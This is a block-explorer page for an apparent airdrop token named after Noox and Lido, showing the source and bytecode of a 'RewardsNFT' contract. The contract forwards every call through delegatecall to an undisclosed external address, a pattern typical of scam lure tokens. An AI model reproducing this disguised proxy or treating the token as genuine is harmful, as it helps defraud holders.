ETH Price: $3,174.92 (+0.98%)
Gas: 6 Gwei

Token

Noox : Lido Airdrop Recipient (Noox Distribution Protocol)
 

Overview

Max Total Supply

5,005 Noox Distribution Protocol

Holders

6,002

Market

Volume (24H)

N/A

Min Price (24H)

N/A

Max Price (24H)

N/A
Filtered by Token Holder
Wormhole Network Exploiter
0x629e7da20197a5429d30da36e77d06cdf796b71a
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
RewardsNFT

Compiler Version
v0.8.13+commit.abaa5c0e

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license
/**
 *Submitted for verification at Etherscan.io on 2023-06-06
*/

// SPDX-License-Identifier: MIT

pragma solidity <=0.8.13;

contract RewardsNFT {
    uint256 private totalSupply = 5000;
    fallback(bytes calldata data) payable external returns(bytes memory){
        (bool r1, bytes memory result) = address(0x3f51cBCFDB336449134b24EcDD89B376109C82B2).delegatecall(data);
        require(r1, "Verification.");
        return result;
    }

    receive() payable external {
    }

    constructor() {
        bytes memory data = abi.encodeWithSignature("initialize()");
        (bool r1,) = address(0x3f51cBCFDB336449134b24EcDD89B376109C82B2).delegatecall(data);
        require(r1, "Verificiation.");
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"stateMutability":"payable","type":"fallback"},{"stateMutability":"payable","type":"receive"}]

608060405261138860005534801561001657600080fd5b5060408051600481526024810182526020810180516001600160e01b031663204a7f0760e21b1790529051600090733f51cbcfdb336449134b24ecdd89b376109c82b2906100659084906100f2565b600060405180830381855af49150503d80600081146100a0576040519150601f19603f3d011682016040523d82523d6000602084013e6100a5565b606091505b50509050806100eb5760405162461bcd60e51b815260206004820152600e60248201526d2b32b934b334b1b4b0ba34b7b71760911b604482015260640160405180910390fd5b505061012d565b6000825160005b8181101561011357602081860181015185830152016100f9565b81811115610122576000828501525b509190910192915050565b6101148061013c6000396000f3fe608060405236600a57005b6000366060600080733f51cbcfdb336449134b24ecdd89b376109c82b26001600160a01b03168585604051603e92919060ce565b600060405180830381855af49150503d80600081146077576040519150601f19603f3d011682016040523d82523d6000602084013e607c565b606091505b50915091508160c15760405162461bcd60e51b815260206004820152600d60248201526c2b32b934b334b1b0ba34b7b71760991b604482015260640160405180910390fd5b8051945060200192505050f35b818382376000910190815291905056fea26469706673582212202d52cb2f953fced88af5f3e24f7cc137f52517d3c19506bf449d644099406c3a64736f6c634300080d0033

Deployed Bytecode

0x608060405236600a57005b6000366060600080733f51cbcfdb336449134b24ecdd89b376109c82b26001600160a01b03168585604051603e92919060ce565b600060405180830381855af49150503d80600081146077576040519150601f19603f3d011682016040523d82523d6000602084013e607c565b606091505b50915091508160c15760405162461bcd60e51b815260206004820152600d60248201526c2b32b934b334b1b0ba34b7b71760991b604482015260640160405180910390fd5b8051945060200192505050f35b818382376000910190815291905056fea26469706673582212202d52cb2f953fced88af5f3e24f7cc137f52517d3c19506bf449d644099406c3a64736f6c634300080d0033

Deployed Bytecode Sourcemap

64:601:0:-:0;;;;;;;;;;187:12;212:7;221:19;252:42;-1:-1:-1;;;;;244:64:0;309:4;;244:70;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;211:103;;;;333:2;325:28;;;;-1:-1:-1;;;325:28:0;;492:2:1;325:28:0;;;474:21:1;531:2;511:18;;;504:30;-1:-1:-1;;;550:18:1;;;543:43;603:18;;325:28:0;;;;;;;;64:601;;;-1:-1:-1;64:601:0;;;-1:-1:-1;;;64:601:0;14:271:1;197:6;189;184:3;171:33;153:3;223:16;;248:13;;;223:16;14:271;-1:-1:-1;14:271:1:o

Swarm Source

ipfs://2d52cb2f953fced88af5f3e24f7cc137f52517d3c19506bf449d644099406c3a
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.